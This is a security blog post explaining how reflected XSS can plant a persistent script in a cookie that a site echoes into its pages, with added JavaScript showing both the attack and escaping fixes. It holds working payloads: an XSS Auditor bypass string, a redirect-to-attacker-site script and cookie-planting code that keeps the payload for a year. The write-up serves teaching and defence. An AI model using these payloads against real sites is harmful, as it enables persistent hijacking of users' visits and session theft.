TLDR
(with thanks to CapnWarhol for the summary)
- If you can execute XSS on a site, you can set cookies for that site.
- If you can set cookies, there may be one whose value is printed into the page on every request.
- If you store script in that cookie, every request carrying it delivers <script>window.location.href="http://my-website.com/"</script>, and you functionally "take over" the domain for that user.
Who doesn’t love XSS? Simple to find, simple to execute, and sometimes simple to bypass XSS auditors.
For bypassing Chrome's XSS Auditor: if the injected value is reflected directly inside a <script> tag, the auditor lets it through. Example: index.php?value=123
prints <script>var value='123';</script> into the HTML, so index.php?value=k'-alert(0)-'k closes the string literal and our alert(0) runs without the auditor blocking it. (The auditor was removed from Chrome in version 78, so on current Chrome there is nothing to bypass.)
Firefox is simple: it has no XSS filter at all. Safari (relevant for mobile users) behaves much like Chrome and blocks most payloads. And IE? Well, who uses IE.
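To make the script-context reflection concrete, here is an added example (not code from the original post) that models what index.php is assumed to do with the value, runs the rendered script under Node with a fake alert, and shows a hardened version. The template string, the names renderVulnerable/renderSafe and the fake alert are assumptions for illustration.

```javascript
// Added example, not the post's code. Models a page that reflects a query
// parameter straight into a <script> block, as the post describes.

// Vulnerable (assumed shape of index.php): the value is concatenated into
// a single-quoted JS string literal with no escaping at all.
function renderVulnerable(value) {
  return "<script>var value='" + value + "';</script>";
}

// Hardened: JSON-encode the value (escapes quotes and backslashes), then
// escape the characters the HTML parser cares about, so a value such as
// "</script><script>..." cannot close the script element either.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderSafe(value) {
  return "<script>var value=" + jsStringLiteral(value) + ";</script>";
}

// Execute the rendered script body the way a browser would, with a fake
// alert that only counts calls. Returns how often alert fired and what
// `value` ended up holding.
function executeRendered(html) {
  const start = html.indexOf("<script>") + "<script>".length;
  const end = html.lastIndexOf("</script>");
  const body = html.slice(start, end);
  let alertCalls = 0;
  const fakeAlert = () => { alertCalls += 1; };
  const value = new Function("alert", body + "\nreturn value;")(fakeAlert);
  return { alertCalls, value };
}

// The payload from the post: k'-alert(0)-'k breaks out of the literal,
// so the vulnerable page evaluates 'k' - alert(0) - 'k'.
const PAYLOAD = "k'-alert(0)-'k";
console.log(renderVulnerable(PAYLOAD), executeRendered(renderVulnerable(PAYLOAD)));
console.log(renderSafe(PAYLOAD), executeRendered(renderSafe(PAYLOAD)));
```

The vulnerable render fires alert once and leaves `value` as NaN; the hardened render keeps `value` equal to the original input and never calls alert. Escaping for the JS string context alone is not enough, which is why `<` and `>` are encoded as well.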
C'mon, show me the XSS domain takeover
Ok, so on to how XSS can take over a domain. First we need a vulnerable cookie, one whose value is printed into the page's HTML, and for this example we'll use InstaShag.com.
In the screenshot below, you can see that if the cookie "site" is set to an XSS payload, that payload is printed straight into the HTML. This is our vulnerable cookie.
Notice that the response also sets the cookie back to the same value, so the payload is persistent. Brilliant. Now we need an XSS to set this cookie.
5 mins later…
That was easy! Now let's create a script to set the cookie. (With thanks to Google, because I'm too lazy to write JS.)
This removes the existing cookie and re-sets it to our XSS payload. Now let's visit Instashag.com and see what happens…
So a simple reflected XSS injected our payload into the cookie. Now anyone who visits my site (which triggers that reflected XSS on instashag.com) and later visits instashag.com will have the XSS executed.
Note: they only have to visit my site ONCE for the payload to be planted in the cookie. From then on, every time they visit Instashag the XSS executes (if you set the cookie to expire in, say, a year).
So how did you take over the domain?
Set the XSS payload to <script>top.location.href='http://www.yoursite.com/';</script> and they'll be redirected the instant the page loads. :)
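The whole chain, as an added example that is not the author's script: the planting code runs inside the reflected XSS on the vulnerable origin, clears the "site" cookie and re-sets it for a year with the redirect payload, and a small stand-in for the vulnerable server echoes the cookie back into the page. The cookie name "site" and instashag.com come from the post; yoursite.com, the one-year lifetime, the PHP-style URL-decoding of the cookie and the shape of the echoing page are assumptions.

```javascript
// Added example, not the post's code. Cookie name "site" is from the post;
// everything else about the server is assumed.

const COOKIE_NAME = "site";
const ONE_YEAR = 365 * 24 * 60 * 60; // Max-Age in seconds
const PAYLOAD = "<script>top.location.href='http://www.yoursite.com/';</script>";

// Build a document.cookie assignment string. The value is percent-encoded
// because the payload contains ';', which would otherwise terminate the
// cookie value. This relies on the server decoding it (PHP's $_COOKIE does).
function buildCookie(name, value, { maxAge, path = "/", domain } = {}) {
  const parts = [`${name}=${encodeURIComponent(value)}`];
  if (maxAge !== undefined) parts.push(`Max-Age=${maxAge}`);
  if (domain) parts.push(`Domain=${domain}`);
  parts.push(`Path=${path}`);
  return parts.join("; ");
}

// Runs inside the reflected XSS, so `doc` is the vulnerable origin's
// document. Clear any existing copy, then set the long-lived one.
// `doc` is injectable so the function can be exercised under Node.
function plantPayload(doc, payload = PAYLOAD) {
  doc.cookie = buildCookie(COOKIE_NAME, "", { maxAge: 0 });
  doc.cookie = buildCookie(COOKIE_NAME, payload, { maxAge: ONE_YEAR });
  return doc.cookie; // what the browser will now send as the Cookie: header
}

// Minimal stand-in for document.cookie (assumption: only name, value and
// Max-Age matter here). Max-Age <= 0 deletes, as in a browser.
class CookieJar {
  constructor() { this.store = new Map(); }
  set cookie(str) {
    const [pair, ...attrs] = str.split(";").map(s => s.trim());
    const eq = pair.indexOf("=");
    const name = pair.slice(0, eq), value = pair.slice(eq + 1);
    const maxAge = attrs.find(a => a.toLowerCase().startsWith("max-age="));
    if (maxAge && Number(maxAge.split("=")[1]) <= 0) this.store.delete(name);
    else this.store.set(name, value);
  }
  get cookie() {
    return [...this.store].map(([k, v]) => `${k}=${v}`).join("; ");
  }
}

// Assumed behaviour of the vulnerable page: read the cookie, URL-decode it
// like PHP does, echo it into the HTML unescaped, and re-issue the cookie
// so the payload keeps living (the persistence the post points out).
function renderVulnerablePage(cookieHeader) {
  const cookies = Object.fromEntries(
    cookieHeader.split(";").filter(Boolean).map(c => {
      const [k, ...v] = c.trim().split("=");
      return [k, decodeURIComponent(v.join("="))];
    }));
  const site = cookies[COOKIE_NAME] || "";
  return {
    html: `<html><body><div id="site">${site}</div></body></html>`,
    setCookie: buildCookie(COOKIE_NAME, site, { maxAge: ONE_YEAR }),
  };
}

// Victim hits the reflected XSS once, then visits the site normally later.
function demo() {
  const browser = new CookieJar();
  plantPayload(browser);
  const page = renderVulnerablePage(browser.cookie);
  return page.html.includes(PAYLOAD);
}
console.log("redirect payload lands on every visit:", demo());
```

In a real browser you would pass `document` instead of a CookieJar; the rest is the same. The server-side fix is equally small: HTML-encode the cookie value before printing it, and treat cookies as untrusted input like any other request header.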
So is this bad?
Well, of course. Many companies running bug bounties tend to pay low amounts for XSS because it's "nothing special"; XSS exists on so many sites. But imagine your bank had an XSS (as well as a vulnerable cookie like this) and you were just browsing the internet minding your own business. Behind the scenes the XSS could have executed without you knowing. The next time you try to visit your bank, you could be redirected to a malicious site. Bad, huh? And of course, they could just as well have stolen your session cookies, etc.